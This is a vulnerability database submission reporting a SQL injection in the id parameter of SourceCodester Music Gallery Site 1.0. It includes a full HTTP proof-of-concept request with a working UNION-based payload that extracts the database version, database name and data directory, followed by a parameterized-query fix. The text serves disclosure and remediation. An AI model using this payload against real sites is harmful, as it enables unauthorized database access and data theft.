| Titolo | SOURCECODESTER Music Gallery Site 1.0 / view_music_details.php id SQL Injection |
|---|
| Descrizione | Music Gallery Site: Any remote hacker can access the php-music/view_music_details.php?id=* URL and inject the SQL Injection malicious code on id parameter which is available in GET request.
Vendor Homepage:
https://www.sourcecodester.com
Software Link:
https://www.sourcecodester.com/php/16073/music-gallery-site-using-php-and-mysql-database-free-source-code.html
Version:
v 1.0
Vulnerable URL:
URL: php-music/view_music_details.php?id=*
Affected Page:
- view_music_details.php
- On this page cid parameter is vulnerable to SQL Injection Attack
- URL of the vulnerable parameter is: php-music/view_music_details.php?id=*
Description:
- The Music Gallery site does have public pages for music library. Whenever someone click on info button any music the popup will appear on the same page. However, on back-end server calls the file view_music_detail.php where Get id parameter is vulnerable to SQL Injection.
Proof of Concept:
Following steps are involved:
1. Go to the music list and click on view info of any music.
2. intercept the traffic through burp and get the actual URL
3. In URL, there is a parameter 'id' which is vulnerable to SQL injection (view_music_details.php?id=1*)
Request:
GET /php-music/view_music_details.php?id=1%27+and+false+union+select+1,version(),database(),4,@@datadir,6,7,8,9,10,11--+- HTTP/1.1
Host: localhost
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=a5fd11866a86264db3a68bb1817b2c7f
Connection: close
Response:
Any remote attacker can access full system through SQL Injection
Recommendation:
Whoever uses this CMS, should update the code of the application in to parameterized queries to avoid SQL Injection attack:
Example Code:
$sql = $obj_admin->db->prepare("SELECT * from `music_list` where id = :id and delete_flag = 0");
$sql->bindparam(':id', $id);
$sql->execute();
$row = $sql->fetch(PDO::FETCH_ASSOC); |
|---|
| Fonte | ⚠️ https://github.com/navaidzansari/CVE_Demo/blob/main/2023/Music%20Gallery%20Site%20-%20SQL%20Injection%202.md |
|---|
| Utente | navaidansari (UID 41266) |
|---|
| Sottomissione | 21/02/2023 11:26 (3 anni fa) |
|---|
| Moderazione | 22/02/2023 19:12 (1 day later) |
|---|
| Stato | Accettato |
|---|
| Voce VulDB | 221631 [SourceCodester Music Gallery Site 1.0 GET Request view_music_details.php ID iniezione SQL] |
|---|
| Punti | 20 |
|---|